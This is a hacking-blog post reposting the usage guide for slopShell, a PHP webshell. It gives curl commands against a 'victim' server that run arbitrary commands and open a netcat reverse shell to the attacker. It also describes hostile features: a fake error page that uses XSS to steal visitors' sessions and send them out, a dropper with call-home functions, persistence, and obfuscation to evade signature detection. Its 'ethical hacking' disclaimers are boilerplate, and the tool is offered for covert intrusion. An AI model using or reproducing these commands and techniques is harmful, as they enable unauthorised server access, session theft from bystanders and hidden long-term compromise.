--> slopShell - The Only Php Webshell You Need | Crackcodes.in


All the information provided on this site are for educational purposes only. The site is no way responsible for any misuse of the information.The word “Hack” or “Hacking” that is used on this site shall be regarded as “Ethical Hack” or “Ethical Hacking” respectively.

slopShell - The Only Php Webshell You Need

SlopShell is php webshell Since I derped, and forgot to talk about usage. Here goes.

slopShell - The Only Php Webshell You Need

What Is slopShell?

SlopShell is php webshell 

Since I derped, and forgot to talk about usage. Here goes.

 For this shell to work, you need 2 things, a victim that allows php file upload(yourself, in an educational environment) and a way to send http requests to this webshell. 

Thank you for all the support the community has given, it means alot to us. Now for things that will be added to this shell, to make it even more awesome. 
  • Mutual TLS, with the ability to generate a CA on the fly(if thats possible) 
  • More refined dropper/shell itself, to ensure that the shell will not be stumbled upon for prolonged access


Setup And Installation

Ok, so here we go folks, there was an itch I had to write something in PHP so this is it. This webshell has a few bells and whistles, and more are added everyday. You will need a pgsql server running that you control. However you implement that is on you.

In Debian:-
apt install -y postgresql php php-pear && python -m pip install proxybroker --user

In RHEL Systems:-

dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

In Windows:- 

install the php msi, and make sure you have an active postgresql server that you can connect to running somewhere. figure it out.

Once you have these set up properly and can confirm that they are running. A command I would encourge using is with pg_ctl you can create the DB that way, or at least init it and start it. Then all the db queries will work fine.

How to interact.

Firstly, you need to choose a valid User-Agent to use, this is kind of like a first layer of protection against your webshell being accidentally stumbled upon by anyone but you. I went with sp/1.1 as its a non typical user-agent used. This can cause red flags in a pentest, and your access or script to be blocked or deleted. So, be smart about it. Code obfuscation wouldnt hurt, I did not add that in because thats on you to decide. To use the shell, there are some presets to aid you in your pen test and traversal of the machine. I did not add much for windows, because I do not like developing for windows. If you have routines or tricks added or know about, feel free to submit an issue with your suggestion and ill add it. An example of how to use this webshell with curl:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

or to execute custom commands:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v 

Or to attempt to establish a reverse shell to your machine:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v 

  • mthd = the method you want to use to establish the reverse shell, this is predefined in the $comma array, feel free to add to it, optional, if it is null, the script will choose for you. 
  • rhost = you, now this and the rport are not required, as it defaults to using netcat with the ip address in the $_SERVER["REMOTE_ADDR"] php env variable. 
  • rport = your listener port, the default was set to 1634, just because. 
  • shell = the type of system shell you want to have. I know bash isnt standard on all systems, but thats why its nice for you to do some system recon before you try to execute this command. 
Here is the better part of this shell. If someone happens upon this shell without supplying the exact user agent string specified in the script, this shell will produce a 500 error with a fake error page then it will attempt some XSS to steal that users session information and sends it back to a handler script on your server/system. This will then attempt to store the information in a running log file. If it is unable to do so, well the backup is your logs. Once the XSS has completed, this shell will redirect the user back to the root(/) of the webserver. So, youll steal sessions if someone finds this, can even beef it up to execute commands on the server on behalf of the user, or drop a reverse shell on the users browser through Beef or another method. The possibilities are legit endless.

Images of use cases

In browser, navigated to without the proper user-agent string. (1st level of auth)

in Browser

Use in the terminal, which is how this was designed to work, using curl with the -vH "User-Agent: sp1.1" switches.


Obfuscated script example:
Obfuscated script

Generation 2 obfuscated script:
Generation 2 obfuscated

Interacting through the client script

Once the client script is complete, you as the operator will not need to interact though curl to utilize this shell. There will be a client script that you can use to execute all commands/control over. In addition to this client script, there is a dropper. This dropper will ensure the script is run at start up even if the website is removed. Including some call home functions, obfuscation if it is requested on a level from 1 to 3, with 3 being the highest as every function will be rot ciphered and then encoded in base64 within the whole file being base64 encoded with a random name assigned to the file itself. This can help avoid signature detection.


Once the encryption routine is fully worked out, the dropper script will be encrypted, and highly obfuscated. Example output:

Base64 decoded: also a test 123

Re-Encoded: YWxzbyBhIHRlc3QgMTIz

Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
Key Length: 96
Encryption Result:
    [original] => also a test 123
    [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
    [encrypted] => meIHs/y6_U7U~7(M
    [base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0=
Decrypt Test:
    [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
    [encrypted] => meIHs/y6_U7U~7(M
    [decrypted] => YWxzbyBhIHRlc3QgMTIz
    [base64_decoded] => also a test 123
    [original] => also a test 123
Warning:-Crackcodes articles  related to Hacking is only for informational and educational purpose. The tutorial and demo provided on Crackcodes is only for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word  “Hacking” that is used on this site shall be regarded as Ethical Hacking.



Custom Tools,5,Exploitation Tools,2,Forensics Tools,2,Information Gathering,2,Kali Linux,6,Password Attacks,1,Sniffing & Spoofing,1,Web Tools,1,Wireless Hacking,1,
Crackcodes.in: slopShell - The Only Php Webshell You Need
slopShell - The Only Php Webshell You Need
SlopShell is php webshell Since I derped, and forgot to talk about usage. Here goes.
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content